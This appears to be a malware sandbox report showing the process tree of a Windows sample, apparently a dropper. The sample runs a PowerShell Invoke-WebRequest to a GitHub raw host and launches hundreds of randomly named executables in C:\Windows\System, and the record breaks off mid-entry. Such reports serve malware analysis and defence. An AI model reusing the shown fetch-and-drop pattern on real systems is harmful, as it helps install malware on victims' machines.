C:\Users\Admin\AppData\Local\Temp\3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3409b82fed8de7359456f2f29a5bac03_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\System\UJnHGhf.exe
C:\Windows\System\UJnHGhf.exe
2⤵
- Executes dropped EXE
PID:224

C:\Windows\System\cxJrRPI.exe
C:\Windows\System\cxJrRPI.exe
2⤵
- Executes dropped EXE
PID:3092

C:\Windows\System\hahDtEj.exe
C:\Windows\System\hahDtEj.exe
2⤵
- Executes dropped EXE
PID:4240

C:\Windows\System\BvSqqZk.exe
C:\Windows\System\BvSqqZk.exe
2⤵
- Executes dropped EXE
PID:1556

C:\Windows\System\riMfklg.exe
C:\Windows\System\riMfklg.exe
2⤵
- Executes dropped EXE
PID:2732

C:\Windows\System\posPyKH.exe
C:\Windows\System\posPyKH.exe
2⤵
- Executes dropped EXE
PID:3468

C:\Windows\System\hpfOWkw.exe
C:\Windows\System\hpfOWkw.exe
2⤵
- Executes dropped EXE
PID:2964

C:\Windows\System\prAMqwi.exe
C:\Windows\System\prAMqwi.exe
2⤵
- Executes dropped EXE
PID:1132

C:\Windows\System\NGzisjZ.exe
C:\Windows\System\NGzisjZ.exe
2⤵
- Executes dropped EXE
PID:32

C:\Windows\System\LYXpYnA.exe
C:\Windows\System\LYXpYnA.exe
2⤵
- Executes dropped EXE
PID:4152

C:\Windows\System\diuokxk.exe
C:\Windows\System\diuokxk.exe
2⤵
- Executes dropped EXE
PID:572

C:\Windows\System\VsGhbdE.exe
C:\Windows\System\VsGhbdE.exe
2⤵
- Executes dropped EXE
PID:3728

C:\Windows\System\piHriuc.exe
C:\Windows\System\piHriuc.exe
2⤵
- Executes dropped EXE
PID:1628

C:\Windows\System\xYYcJrg.exe
C:\Windows\System\xYYcJrg.exe
2⤵
- Executes dropped EXE
PID:4944

C:\Windows\System\rArXEMT.exe
C:\Windows\System\rArXEMT.exe
2⤵
- Executes dropped EXE
PID:3764

C:\Windows\System\QUzJtvk.exe
C:\Windows\System\QUzJtvk.exe
2⤵
- Executes dropped EXE
PID:1324

C:\Windows\System\yMEGMQk.exe
C:\Windows\System\yMEGMQk.exe
2⤵
- Executes dropped EXE
PID:3160

C:\Windows\System\kNxabxC.exe
C:\Windows\System\kNxabxC.exe
2⤵
- Executes dropped EXE
PID:3576

C:\Windows\System\sqVakCy.exe
C:\Windows\System\sqVakCy.exe
2⤵
- Executes dropped EXE
PID:2952

C:\Windows\System\QpigQTq.exe
C:\Windows\System\QpigQTq.exe
2⤵
- Executes dropped EXE
PID:4124

C:\Windows\System\LPaMcmD.exe
C:\Windows\System\LPaMcmD.exe
2⤵
- Executes dropped EXE
PID:3388

C:\Windows\System\WiufyRA.exe
C:\Windows\System\WiufyRA.exe
2⤵
- Executes dropped EXE
PID:4392

C:\Windows\System\vvaMkhS.exe
C:\Windows\System\vvaMkhS.exe
2⤵
- Executes dropped EXE
PID:1460

C:\Windows\System\tpmFhJW.exe
C:\Windows\System\tpmFhJW.exe
2⤵
- Executes dropped EXE
PID:4640

C:\Windows\System\EJmSAqW.exe
C:\Windows\System\EJmSAqW.exe
2⤵
- Executes dropped EXE
PID:4744

C:\Windows\System\qVbDfzR.exe
C:\Windows\System\qVbDfzR.exe
2⤵
- Executes dropped EXE
PID:1172

C:\Windows\System\tKIaQhN.exe
C:\Windows\System\tKIaQhN.exe
2⤵
- Executes dropped EXE
PID:3612

C:\Windows\System\whhydKp.exe
C:\Windows\System\whhydKp.exe
2⤵
- Executes dropped EXE
PID:1116

C:\Windows\System\poRyFNu.exe
C:\Windows\System\poRyFNu.exe
2⤵
- Executes dropped EXE
PID:4352

C:\Windows\System\CUKSDdj.exe
C:\Windows\System\CUKSDdj.exe
2⤵
- Executes dropped EXE
PID:3684

C:\Windows\System\IdKIUYS.exe
C:\Windows\System\IdKIUYS.exe
2⤵
- Executes dropped EXE
PID:388

C:\Windows\System\gFoBVEf.exe
C:\Windows\System\gFoBVEf.exe
2⤵
- Executes dropped EXE
PID:1776

C:\Windows\System\nMaGzfu.exe
C:\Windows\System\nMaGzfu.exe
2⤵
- Executes dropped EXE
PID:812

C:\Windows\System\FCrIOsA.exe
C:\Windows\System\FCrIOsA.exe
2⤵
- Executes dropped EXE
PID:3864

C:\Windows\System\BCQLfIm.exe
C:\Windows\System\BCQLfIm.exe
2⤵
- Executes dropped EXE
PID:3400

C:\Windows\System\BJWnuMl.exe
C:\Windows\System\BJWnuMl.exe
2⤵
- Executes dropped EXE
PID:4276

C:\Windows\System\nYImdRn.exe
C:\Windows\System\nYImdRn.exe
2⤵
- Executes dropped EXE
PID:4504

C:\Windows\System\ZTtcjXO.exe
C:\Windows\System\ZTtcjXO.exe
2⤵
- Executes dropped EXE
PID:3136

C:\Windows\System\WIGJucq.exe
C:\Windows\System\WIGJucq.exe
2⤵
- Executes dropped EXE
PID:4972

C:\Windows\System\bJbpDLw.exe
C:\Windows\System\bJbpDLw.exe
2⤵
- Executes dropped EXE
PID:3568

C:\Windows\System\Pkvrsow.exe
C:\Windows\System\Pkvrsow.exe
2⤵
- Executes dropped EXE
PID:1928

C:\Windows\System\PycPqJo.exe
C:\Windows\System\PycPqJo.exe
2⤵
- Executes dropped EXE
PID:2948

C:\Windows\System\CWCCbkT.exe
C:\Windows\System\CWCCbkT.exe
2⤵
- Executes dropped EXE
PID:3128

C:\Windows\System\ZLhBEYa.exe
C:\Windows\System\ZLhBEYa.exe
2⤵
- Executes dropped EXE
PID:4564

C:\Windows\System\QfOJODx.exe
C:\Windows\System\QfOJODx.exe
2⤵
- Executes dropped EXE
PID:3960

C:\Windows\System\jHygAKi.exe
C:\Windows\System\jHygAKi.exe
2⤵
- Executes dropped EXE
PID:844

C:\Windows\System\MUCFoKr.exe
C:\Windows\System\MUCFoKr.exe
2⤵
- Executes dropped EXE
PID:960

C:\Windows\System\wLwhbgr.exe
C:\Windows\System\wLwhbgr.exe
2⤵
- Executes dropped EXE
PID:2484

C:\Windows\System\wRLQoDj.exe
C:\Windows\System\wRLQoDj.exe
2⤵
- Executes dropped EXE
PID:916

C:\Windows\System\QUzYNUK.exe
C:\Windows\System\QUzYNUK.exe
2⤵
- Executes dropped EXE
PID:536

C:\Windows\System\NZVLAYQ.exe
C:\Windows\System\NZVLAYQ.exe
2⤵
- Executes dropped EXE
PID:1856

C:\Windows\System\akTAABJ.exe
C:\Windows\System\akTAABJ.exe
2⤵
- Executes dropped EXE
PID:3200

C:\Windows\System\qAGBqWp.exe
C:\Windows\System\qAGBqWp.exe
2⤵
- Executes dropped EXE
PID:1076

C:\Windows\System\BezLPIn.exe
C:\Windows\System\BezLPIn.exe
2⤵
- Executes dropped EXE
PID:456

C:\Windows\System\nnuUYZo.exe
C:\Windows\System\nnuUYZo.exe
2⤵
- Executes dropped EXE
PID:3852

C:\Windows\System\qAxenaz.exe
C:\Windows\System\qAxenaz.exe
2⤵
- Executes dropped EXE
PID:5012

C:\Windows\System\KYiaqlX.exe
C:\Windows\System\KYiaqlX.exe
2⤵
- Executes dropped EXE
PID:2884

C:\Windows\System\bEHPdcr.exe
C:\Windows\System\bEHPdcr.exe
2⤵
- Executes dropped EXE
PID:3212

C:\Windows\System\EHyOajO.exe
C:\Windows\System\EHyOajO.exe
2⤵
- Executes dropped EXE
PID:704

C:\Windows\System\MyvGoQq.exe
C:\Windows\System\MyvGoQq.exe
2⤵
- Executes dropped EXE
PID:1760

C:\Windows\System\RwsVesf.exe
C:\Windows\System\RwsVesf.exe
2⤵
- Executes dropped EXE
PID:4556

C:\Windows\System\LeuvPbZ.exe
C:\Windows\System\LeuvPbZ.exe
2⤵
- Executes dropped EXE
PID:2116

C:\Windows\System\cSiJgwd.exe
C:\Windows\System\cSiJgwd.exe
2⤵
- Executes dropped EXE
PID:2668

C:\Windows\System\DqoQMPR.exe
C:\Windows\System\DqoQMPR.exe
2⤵
- Executes dropped EXE
PID:60

C:\Windows\System\kKuMgYS.exe
C:\Windows\System\kKuMgYS.exe
2⤵
PID:2456

C:\Windows\System\CXVoKmw.exe
C:\Windows\System\CXVoKmw.exe
2⤵
PID:3544

C:\Windows\System\BhURsks.exe
C:\Windows\System\BhURsks.exe
2⤵
PID:3908

C:\Windows\System\dlUCKso.exe
C:\Windows\System\dlUCKso.exe
2⤵
PID:4228

C:\Windows\System\KUnvBhA.exe
C:\Windows\System\KUnvBhA.exe
2⤵
PID:4280

C:\Windows\System\sxjrVYJ.exe
C:\Windows\System\sxjrVYJ.exe
2⤵
PID:1836

C:\Windows\System\EuSGgve.exe
C:\Windows\System\EuSGgve.exe
2⤵
PID:920

C:\Windows\System\bcEahxH.exe
C:\Windows\System\bcEahxH.exe
2⤵
PID:3804

C:\Windows\System\OhTzRrI.exe
C:\Windows\System\OhTzRrI.exe
2⤵
PID:4988

C:\Windows\System\kMLJkhQ.exe
C:\Windows\System\kMLJkhQ.exe
2⤵
PID:4488

C:\Windows\System\iEdmjDY.exe
C:\Windows\System\iEdmjDY.exe
2⤵
PID:5008

C:\Windows\System\pAInwqQ.exe
C:\Windows\System\pAInwqQ.exe
2⤵
PID:4216

C:\Windows\System\odpmJoi.exe
C:\Windows\System\odpmJoi.exe
2⤵
PID:2376

C:\Windows\System\wKzIxhi.exe
C:\Windows\System\wKzIxhi.exe
2⤵
PID:1096

C:\Windows\System\hhWATWU.exe
C:\Windows\System\hhWATWU.exe
2⤵
PID:4040

C:\Windows\System\xGhJlBW.exe
C:\Windows\System\xGhJlBW.exe
2⤵
PID:4588

C:\Windows\System\RHSeTsc.exe
C:\Windows\System\RHSeTsc.exe
2⤵
PID:3820

C:\Windows\System\TZTHrei.exe
C:\Windows\System\TZTHrei.exe
2⤵
PID:2792

C:\Windows\System\zBvudtg.exe
C:\Windows\System\zBvudtg.exe
2⤵
PID:2928

C:\Windows\System\MxVpOZC.exe
C:\Windows\System\MxVpOZC.exe
2⤵
PID:3516

C:\Windows\System\ipeTbPq.exe
C:\Windows\System\ipeTbPq.exe
2⤵
PID:2720

C:\Windows\System\bUknmgn.exe
C:\Windows\System\bUknmgn.exe
2⤵
PID:912

C:\Windows\System\ByFkJGT.exe
C:\Windows\System\ByFkJGT.exe
2⤵
PID:1664

C:\Windows\System\LznbDvD.exe
C:\Windows\System\LznbDvD.exe
2⤵
PID:3264

C:\Windows\System\BprYnkM.exe
C:\Windows\System\BprYnkM.exe
2⤵
PID:1492

C:\Windows\System\kPGgkPi.exe
C:\Windows\System\kPGgkPi.exe
2⤵
PID:3472

C:\Windows\System\FixVHSa.exe
C:\Windows\System\FixVHSa.exe
2⤵
PID:1612

C:\Windows\System\QrUNESY.exe
C:\Windows\System\QrUNESY.exe
2⤵
PID:3444

C:\Windows\System\eFRZHRE.exe
C:\Windows\System\eFRZHRE.exe
2⤵
PID:4616

C:\Windows\System\RfRiRpb.exe
C:\Windows\System\RfRiRpb.exe
2⤵
PID:4968

C:\Windows\System\tqjyPMI.exe
C:\Windows\System\tqjyPMI.exe
2⤵
PID:2624

C:\Windows\System\teCEYGw.exe
C:\Windows\System\teCEYGw.exe
2⤵
PID:4748

C:\Windows\System\WcZEmmK.exe
C:\Windows\System\WcZEmmK.exe
2⤵
PID:376

C:\Windows\System\zEgTYJa.exe
C:\Windows\System\zEgTYJa.exe
2⤵
PID:4952

C:\Windows\System\sBMfwAs.exe
C:\Windows\System\sBMfwAs.exe
2⤵
PID:5156

C:\Windows\System\nFIAlfu.exe
C:\Windows\System\nFIAlfu.exe
2⤵
PID:5176

C:\Windows\System\QLqCtgC.exe
C:\Windows\System\QLqCtgC.exe
2⤵
PID:5196

C:\Windows\System\nnEyqNg.exe
C:\Windows\System\nnEyqNg.exe
2⤵
PID:5220

C:\Windows\System\uTHQWRm.exe
C:\Windows\System\uTHQWRm.exe
2⤵
PID:5240

C:\Windows\System\FycIzlW.exe
C:\Windows\System\FycIzlW.exe
2⤵
PID:5264

C:\Windows\System\FrZrKDi.exe
C:\Windows\System\FrZrKDi.exe
2⤵
PID:5288

C:\Windows\System\mXcHNBk.exe
C:\Windows\System\mXcHNBk.exe
2⤵
PID:5304

C:\Windows\System\qtHtEGr.exe
C:\Windows\System\qtHtEGr.exe
2⤵
PID:5328

C:\Windows\System\ygdKYrx.exe
C:\Windows\System\ygdKYrx.exe
2⤵
PID:5352

C:\Windows\System\YXdqOel.exe
C:\Windows\System\YXdqOel.exe
2⤵
PID:5380

C:\Windows\System\bFrXWqG.exe
C:\Windows\System\bFrXWqG.exe
2⤵
PID:5404

C:\Windows\System\lrxgfFI.exe
C:\Windows\System\lrxgfFI.exe
2⤵
PID:5428

C:\Windows\System\XmchyUx.exe
C:\Windows\System\XmchyUx.exe
2⤵
PID:5460

C:\Windows\System\VOkpkLs.exe
C:\Windows\System\VOkpkLs.exe
2⤵
PID:5500

C:\Windows\System\oDJneOE.exe
C:\Windows\System\oDJneOE.exe
2⤵
PID:5520

C:\Windows\System\MmrFiUw.exe
C:\Windows\System\MmrFiUw.exe
2⤵
PID:5548

C:\Windows\System\OTRLPSt.exe
C:\Windows\System\OTRLPSt.exe
2⤵
PID:5572

C:\Windows\System\fDQQghP.exe
C:\Windows\System\fDQQghP.exe
2⤵
PID:5600

C:\Windows\System\BPdEjem.exe
C:\Windows\System\BPdEjem.exe
2⤵
PID:5620

C:\Windows\System\KOfEuIv.exe
C:\Windows\System\KOfEuIv.exe
2⤵
PID:5644

C:\Windows\System\ImnGChi.exe
C:\Windows\System\ImnGChi.exe
2⤵
PID:5664

C:\Windows\System\wpMQrtb.exe
C:\Windows\System\wpMQrtb.exe
2⤵
PID:5684

C:\Windows\System\Eckwlmb.exe
C:\Windows\System\Eckwlmb.exe
2⤵
PID:5716

C:\Windows\System\axeNkrG.exe
C:\Windows\System\axeNkrG.exe
2⤵
PID:5736

C:\Windows\System\RpbsecX.exe
C:\Windows\System\RpbsecX.exe
2⤵
PID:5756

C:\Windows\System\ZIcmhQm.exe
C:\Windows\System\ZIcmhQm.exe
2⤵
PID:5780

C:\Windows\System\rymjepb.exe
C:\Windows\System\rymjepb.exe
2⤵
PID:5800

C:\Windows\System\LizQbsM.exe
C:\Windows\System\LizQbsM.exe
2⤵
PID:5824

C:\Windows\System\CSkfNIx.exe
C:\Windows\System\CSkfNIx.exe
2⤵
PID:5848

C:\Windows\System\mCFzbry.exe
C:\Windows\System\mCFzbry.exe
2⤵
PID:5876

C:\Windows\System\JRzeRIT.exe
C:\Windows\System\JRzeRIT.exe
2⤵
PID:5900

C:\Windows\System\MQcDOZY.exe
C:\Windows\System\MQcDOZY.exe
2⤵
PID:5920

C:\Windows\System\XplJdmx.exe
C:\Windows\System\XplJdmx.exe
2⤵
PID:5948

C:\Windows\System\ZVwfzvD.exe
C:\Windows\System\ZVwfzvD.exe
2⤵
PID:5964

C:\Windows\System\swRybyY.exe
C:\Windows\System\swRybyY.exe
2⤵
PID:5984

C:\Windows\System\RZhAHuC.exe
C:\Windows\System\RZhAHuC.exe
2⤵
PID:6004

C:\Windows\System\odhQCvT.exe
C:\Windows\System\odhQCvT.exe
2⤵
PID:6028

C:\Windows\System\SZPnFzR.exe
C:\Windows\System\SZPnFzR.exe
2⤵
PID:6048

C:\Windows\System\cvtZCff.exe
C:\Windows\System\cvtZCff.exe
2⤵
PID:6072

C:\Windows\System\gyNFDUX.exe
C:\Windows\System\gyNFDUX.exe
2⤵
PID:6096

C:\Windows\System\gWOrKTB.exe
C:\Windows\System\gWOrKTB.exe
2⤵
PID:6112

C:\Windows\System\cQdOmUD.exe
C:\Windows\System\cQdOmUD.exe
2⤵
PID:6140

C:\Windows\System\BdNaNLQ.exe
C:\Windows\System\BdNaNLQ.exe
2⤵
PID:228

C:\Windows\System\hjnZRJu.exe
C:\Windows\System\hjnZRJu.exe
2⤵
PID:1732

C:\Windows\System\qAweDlb.exe
C:\Windows\System\qAweDlb.exe
2⤵
PID:5148

C:\Windows\System\mCzJDAW.exe
C:\Windows\System\mCzJDAW.exe
2⤵
PID:5336

C:\Windows\System\PglphEW.exe
C:\Windows\System\PglphEW.exe
2⤵
PID:5440

C:\Windows\System\amOWcmu.exe
C:\Windows\System\amOWcmu.exe
2⤵
PID:5208

C:\Windows\System\fHGadCq.exe
C:\Windows\System\fHGadCq.exe
2⤵
PID:5276

C:\Windows\System\JqHaNpc.exe
C:\Windows\System\JqHaNpc.exe
2⤵
PID:5536

C:\Windows\System\TIFKSvQ.exe
C:\Windows\System\TIFKSvQ.exe
2⤵
PID:5344

C:\Windows\System\CfwfVXk.exe
C:\Windows\System\CfwfVXk.exe
2⤵
PID:5416

C:\Windows\System\qkCBQDr.exe
C:\Windows\System\qkCBQDr.exe
2⤵
PID:5204

C:\Windows\System\rXeNSSu.exe
C:\Windows\System\rXeNSSu.exe
2⤵
PID:5252

C:\Windows\System\DcCmHEC.exe
C:\Windows\System\DcCmHEC.exe
2⤵
PID:2304

C:\Windows\System\YhsNJxC.exe
C:\Windows\System\YhsNJxC.exe
2⤵
PID:5564

C:\Windows\System\qCZyQMb.exe
C:\Windows\System\qCZyQMb.exe
2⤵
PID:5772

C:\Windows\System\HxmlDap.exe
C:\Windows\System\HxmlDap.exe
2⤵
PID:5860

C:\Windows\System\FTnBfsz.exe
C:\Windows\System\FTnBfsz.exe
2⤵
PID:5640

C:\Windows\System\PZcyrbn.exe
C:\Windows\System\PZcyrbn.exe
2⤵
PID:5976

C:\Windows\System\SYyooSU.exe
C:\Windows\System\SYyooSU.exe
2⤵
PID:5700

C:\Windows\System\YSrtokn.exe
C:\Windows\System\YSrtokn.exe
2⤵
PID:5728

C:\Windows\System\eymzEzr.exe
C:\Windows\System\eymzEzr.exe
2⤵
PID:5752

C:\Windows\System\sPhnbzG.exe
C:\Windows\System\sPhnbzG.exe
2⤵
PID:5788

C:\Windows\System\FAAElxg.exe
C:\Windows\System\FAAElxg.exe
2⤵
PID:5820

C:\Windows\System\iehTfRF.exe
C:\Windows\System\iehTfRF.exe
2⤵
PID:4704

C:\Windows\System\fJpiFqM.exe
C:\Windows\System\fJpiFqM.exe
2⤵
PID:5128

C:\Windows\System\UXghDic.exe
C:\Windows\System\UXghDic.exe
2⤵
PID:5928

C:\Windows\System\SGBNxUE.exe
C:\Windows\System\SGBNxUE.exe
2⤵
PID:5588

C:\Windows\System\REvnxId.exe
C:\Windows\System\REvnxId.exe
2⤵
PID:6152

C:\Windows\System\wEUATTv.exe
C:\Windows\System\wEUATTv.exe
2⤵
PID:6180

C:\Windows\System\eZyXQxN.exe
C:\Windows\System\eZyXQxN.exe
2⤵
PID:6200

C:\Windows\System\qzkeDiQ.exe
C:\Windows\System\qzkeDiQ.exe
2⤵
PID:6240

C:\Windows\System\AZtUYGo.exe
C:\Windows\System\AZtUYGo.exe
2⤵
PID:6264

C:\Windows\System\JRLhYtn.exe
C:\Windows\System\JRLhYtn.exe
2⤵
PID:6284

C:\Windows\System\cAmSibK.exe
C:\Windows\System\cAmSibK.exe
2⤵
PID:6308

C:\Windows\System\HCSanPd.exe
C:\Windows\System\HCSanPd.exe
2⤵
PID:6324

C:\Windows\System\ZUBegvK.exe
C:\Windows\System\ZUBegvK.exe
2⤵
PID:6348

C:\Windows\System\rWErJht.exe
C:\Windows\System\rWErJht.exe
2⤵
PID:6372

C:\Windows\System\rEPICGU.exe
C:\Windows\System\rEPICGU.exe
2⤵
PID:6388

C:\Windows\System\PEzVuHm.exe
C:\Windows\System\PEzVuHm.exe
2⤵
PID:6412

C:\Windows\System\cqgUNzI.exe
C:\Windows\System\cqgUNzI.exe
2⤵
PID:6436

C:\Windows\System\gNlUXhr.exe
C:\Windows\System\gNlUXhr.exe
2⤵
PID:6452

C:\Windows\System\EMzqBjP.exe
C:\Windows\System\EMzqBjP.exe
2⤵
PID:6476

C:\Windows\System\vXOnIan.exe
C:\Windows\System\vXOnIan.exe
2⤵
PID:6500

C:\Windows\System\ojVDcxd.exe
C:\Windows\System\ojVDcxd.exe
2⤵
PID:6520

C:\Windows\System\JvfmeaW.exe
C:\Windows\System\JvfmeaW.exe
2⤵
PID:6536

C:\Windows\System\MePpApt.exe
C:\Windows\System\MePpApt.exe
2⤵
PID:6560

C:\Windows\System\RpOoTlR.exe
C:\Windows\System\RpOoTlR.exe
2⤵
PID:6588

C:\Windows\System\KjVpqOR.exe
C:\Windows\System\KjVpqOR.exe
2⤵
PID:6604

C:\Windows\System\oXqeWym.exe
C:\Windows\System\oXqeWym.exe
2⤵
PID:6636

C:\Windows\System\tPPmjrD.exe
C:\Windows\System\tPPmjrD.exe
2⤵
PID:6660

C:\Windows\System\VNKzVzB.exe
C:\Windows\System\VNKzVzB.exe
2⤵
PID:6692

C:\Windows\System\friNmyQ.exe
C:\Windows\System\friNmyQ.exe
2⤵
PID:6708

C:\Windows\System\XXtUeTG.exe
C:\Windows\System\XXtUeTG.exe
2⤵
PID:6732

C:\Windows\System\QGVyKxL.exe
C:\Windows\System\QGVyKxL.exe
2⤵
PID:6752

C:\Windows\System\rGdeZDn.exe
C:\Windows\System\rGdeZDn.exe
2⤵
PID:6776

C:\Windows\System\dOxIISh.exe
C:\Windows\System\dOxIISh.exe
2⤵
PID:6796

C:\Windows\System\jdDAmHw.exe
C:\Windows\System\jdDAmHw.exe
2⤵
PID:6812

C:\Windows\System\AOTARZC.exe
C:\Windows\System\AOTARZC.exe
2⤵
PID:6828

C:\Windows\System\Syordve.exe
C:\Windows\System\Syordve.exe
2⤵
PID:6860

C:\Windows\System\HjxOGbG.exe
C:\Windows\System\HjxOGbG.exe
2⤵
PID:6880

C:\Windows\System\dSQOXsG.exe
C:\Windows\System\dSQOXsG.exe
2⤵
PID:6912

C:\Windows\System\GXSMqqd.exe
C:\Windows\System\GXSMqqd.exe
2⤵
PID:6932

C:\Windows\System\tuXLMPr.exe
C:\Windows\System\tuXLMPr.exe
2⤵
PID:6964

C:\Windows\System\QrxytBr.exe
C:\Windows\System\QrxytBr.exe
2⤵
PID:6980

C:\Windows\System\cyzTtgc.exe
C:\Windows\System\cyzTtgc.exe
2⤵
PID:7000

C:\Windows\System\HLhooXY.exe
C:\Windows\System\HLhooXY.exe
2⤵
PID:7024

C:\Windows\System\AxQXbOv.exe
C:\Windows\System\AxQXbOv.exe
2⤵
PID:7040

C:\Windows\System\BIDrjro.exe
C:\Windows\System\BIDrjro.exe
2⤵
PID:7064

C:\Windows\System\yShrilo.exe
C:\Windows\System\yShrilo.exe
2⤵
PID:7092

C:\Windows\System\ZULHBcr.exe
C:\Windows\System\ZULHBcr.exe
2⤵
PID:7116

C:\Windows\System\snTEAWM.exe
C:\Windows\System\snTEAWM.exe
2⤵
PID:7136

C:\Windows\System\ZDhLYRR.exe
C:\Windows\System\ZDhLYRR.exe
2⤵
PID:7160

C:\Windows\System\IRRvOdV.exe
C:\Windows\System\IRRvOdV.exe
2⤵
PID:5480

C:\Windows\System\dpRASAv.exe
C:\Windows\System\dpRASAv.exe
2⤵
PID:1356

C:\Windows\System\EeBcGhe.exe
C:\Windows\System\EeBcGhe.exe
2⤵
PID:4984

C:\Windows\System\JWkgtTO.exe
C:\Windows\System\JWkgtTO.exe
2⤵
PID:4892

C:\Windows\System\GIPEIbR.exe
C:\Windows\System\GIPEIbR.exe
2⤵
PID:2000

C:\Windows\System\YgnqgSd.exe
C:\Windows\System\YgnqgSd.exe
2⤵
PID:6064

C:\Windows\System\avyegjX.exe
C:\Windows\System\avyegjX.exe
2⤵
PID:5792

C:\Windows\System\wEAiiJt.exe
C:\Windows\System\wEAiiJt.exe
2⤵
PID:3148

C:\Windows\System\jBFThbh.exe
C:\Windows\System\jBFThbh.exe
2⤵
PID:6040

C:\Windows\System\AhkFTCP.exe
C:\Windows\System\AhkFTCP.exe
2⤵
PID:5616

C:\Windows\System\AJSMDfH.exe
C:\Windows\System\AJSMDfH.exe
2⤵
PID:6208

C:\Windows\System\zCgULrd.exe
C:\Windows\System\zCgULrd.exe
2⤵
PID:6236

C:\Windows\System\JjhAmbX.exe
C:\Windows\System\JjhAmbX.exe
2⤵
PID:6296

C:\Windows\System\ppGcoLC.exe
C:\Windows\System\ppGcoLC.exe
2⤵
PID:6368

C:\Windows\System\UcYeBaX.exe
C:\Windows\System\UcYeBaX.exe
2⤵
PID:6432

C:\Windows\System\vhBEPjP.exe
C:\Windows\System\vhBEPjP.exe
2⤵
PID:5940

C:\Windows\System\txiFcnJ.exe
C:\Windows\System\txiFcnJ.exe
2⤵
PID:6516

C:\Windows\System\IwfRjHT.exe
C:\Windows\System\IwfRjHT.exe
2⤵
PID:6612

C:\Windows\System\wnwulNc.exe
C:\Windows\System\wnwulNc.exe
2⤵
PID:6688

C:\Windows\System\QbvIcCt.exe
C:\Windows\System\QbvIcCt.exe
2⤵
PID:5560

C:\Windows\System\rhlRuGU.exe
C:\Windows\System\rhlRuGU.exe
2⤵
PID:6908

C:\Windows\System\poBzSmT.exe
C:\Windows\System\poBzSmT.exe
2⤵
PID:5676

C:\Windows\System\gjeZbch.exe
C:\Windows\System\gjeZbch.exe
2⤵
PID:7020

C:\Windows\System\kAGzQNa.exe
C:\Windows\System\kAGzQNa.exe
2⤵
PID:7184

C:\Windows\System\NTGimMR.exe
C:\Windows\System\NTGimMR.exe
2⤵
PID:7200

C:\Windows\System\tvXrhIt.exe
C:\Windows\System\tvXrhIt.exe
2⤵
PID:7232

C:\Windows\System\GxUwKDB.exe
C:\Windows\System\GxUwKDB.exe
2⤵
PID:7252

C:\Windows\System\TlJhriR.exe
C:\Windows\System\TlJhriR.exe
2⤵
PID:7276

C:\Windows\System\XZEwvHQ.exe
C:\Windows\System\XZEwvHQ.exe
2⤵
PID:7300

C:\Windows\System\CRUTtxO.exe
C:\Windows\System\CRUTtxO.exe
2⤵
PID:7320

C:\Windows\System\PnXRZkk.exe
C:\Windows\System\PnXRZkk.exe
2⤵
PID:7344

C:\Windows\System\GtwVPZd.exe
C:\Windows\System\GtwVPZd.exe
2⤵
PID:7364

C:\Windows\System\sNVGTPF.exe
C:\Windows\System\sNVGTPF.exe
2⤵
PID:7388

C:\Windows\System\EnKKYhE.exe
C:\Windows\System\EnKKYhE.exe
2⤵
PID:7408

C:\Windows\System\iYSgHIf.exe
C:\Windows\System\iYSgHIf.exe
2⤵
PID:7436

C:\Windows\System\ioVCNEX.exe
C:\Windows\System\ioVCNEX.exe
2⤵
PID:7456

C:\Windows\System\SdrQiAJ.exe
C:\Windows\System\SdrQiAJ.exe
2⤵
PID:7484

C:\Windows\System\BnlmngQ.exe
C:\Windows\System\BnlmngQ.exe
2⤵
PID:7504

C:\Windows\System\CLIspNI.exe
C:\Windows\System\CLIspNI.exe
2⤵
PID:7532

C:\Windows\System\nPowySi.exe
C:\Windows\System\nPowySi.exe
2⤵
PID:7548

C:\Windows\System\zKNDrDf.exe
C:\Windows\System\zKNDrDf.exe
2⤵
PID:7572

C:\Windows\System\JyvSLpk.exe
C:\Windows\System\JyvSLpk.exe
2⤵
PID:7600

C:\Windows\System\RMdEivL.exe
C:\Windows\System\RMdEivL.exe
2⤵
PID:7624

C:\Windows\System\RhPCoYK.exe
C:\Windows\System\RhPCoYK.exe
2⤵
PID:7648

C:\Windows\System\WchvNzk.exe
C:\Windows\System\WchvNzk.exe
2⤵
PID:7672

C:\Windows\System\NgUeAtt.exe
C:\Windows\System\NgUeAtt.exe
2⤵
PID:7700

C:\Windows\System\SVQGltv.exe
C:\Windows\System\SVQGltv.exe
2⤵
PID:7720

C:\Windows\System\Yzcuobq.exe
C:\Windows\System\Yzcuobq.exe
2⤵
PID:7744

C:\Windows\System\IEbARzF.exe
C:\Windows\System\IEbARzF.exe
2⤵
PID:7780

C:\Windows\System\VhwkADA.exe
C:\Windows\System\VhwkADA.exe
2⤵
PID:7808

C:\Windows\System\YqfeCJo.exe
C:\Windows\System\YqfeCJo.exe
2⤵
PID:7824

C:\Windows\System\fLXHLKN.exe
C:\Windows\System\fLXHLKN.exe
2⤵
PID:7848

C:\Windows\System\yskElmz.exe
C:\Windows\System\yskElmz.exe
2⤵
PID:7868

C:\Windows\System\oXMgXSH.exe
C:\Windows\System\oXMgXSH.exe
2⤵
PID:7892

C:\Windows\System\vLTolDa.exe
C:\Windows\System\vLTolDa.exe
2⤵
PID:7916

C:\Windows\System\kRPXeYz.exe
C:\Windows\System\kRPXeYz.exe
2⤵
PID:7936

C:\Windows\System\BgHvVRA.exe
C:\Windows\System\BgHvVRA.exe
2⤵
PID:7960

C:\Windows\System\rIduroM.exe
C:\Windows\System\rIduroM.exe
2⤵
PID:7980

C:\Windows\System\ldudVZX.exe
C:\Windows\System\ldudVZX.exe
2⤵
PID:8004

C:\Windows\System\yHrfqqw.exe
C:\Windows\System\yHrfqqw.exe
2⤵
PID:8028

C:\Windows\System\OReaAHK.exe
C:\Windows\System\OReaAHK.exe
2⤵
PID:8052

C:\Windows\System\sNURBZu.exe
C:\Windows\System\sNURBZu.exe
2⤵
PID:8076

C:\Windows\System\CsbmfnK.exe
C:\Windows\System\CsbmfnK.exe
2⤵
PID:8100

C:\Windows\System\YbokWPJ.exe
C:\Windows\System\YbokWPJ.exe
2⤵
PID:8128

C:\Windows\System\IXwzemQ.exe
C:\Windows\System\IXwzemQ.exe
2⤵
PID:8148

C:\Windows\System\mViEygD.exe
